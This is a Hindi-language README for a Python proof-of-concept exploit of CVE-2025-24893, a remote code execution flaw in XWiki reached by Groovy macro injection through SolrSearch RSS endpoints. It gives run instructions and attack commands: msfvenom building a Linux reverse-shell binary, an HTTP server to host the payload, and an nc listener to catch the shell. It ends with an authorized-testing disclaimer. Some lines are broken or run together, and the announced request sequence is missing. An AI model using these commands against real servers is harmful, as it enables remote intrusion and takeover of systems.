
PoC CVE-2025-24893 का शोषण करता है, जो XWiki में एक रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता है, जो अतुल्यकालिक रूप से प्रस्तुत किए जाने वाले Groovy मैक्रोज़ में अनुचित सैंडबॉक्सिंग के कारण उत्पन्न होती है। यह RSS-आधारित SolrSearch एंडपॉइंट्स में इंजेक्शन के माध्यम से मनमाना कमांड निष्पादन की अनुमति देता है।
यह Python स्क्रिप्ट CVE-2025-24893 का शोषण करती है, जो XWiki में एक रिमोट कोड निष्पादन (RCE) भेद्यता है, जो Groovy मैक्रोज़ में अनुचित सैंडबॉक्सिंग के कारण उत्पन्न होती है, जिन्हें एसिंक्रोनस रूप से रेंडर किया जाता है। यह RSS-आधारित SolrSearch एंडपॉइंट्स में इंजेक्शन के माध्यम से मनमाना कमांड निष्पादन की अनुमति देती है।
msfvenom के साथ)स्क्रिप्ट को क्लोन करें या डाउनलोड करें।
सुनिश्चित करें कि आपके पास निम्नलिखित इंस्टॉल हैं:
msfvenomjq (bash पेलोड में उपयोग किया जाता है)स्क्रिप्ट चलाएँ:
python3 CVE-2025-24893-PoC.py
मेनू में से चुनें:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
स्क्रिप्ट लक्ष्य को निम्नलिखित अनुक्रम भेजती है:
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग, जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।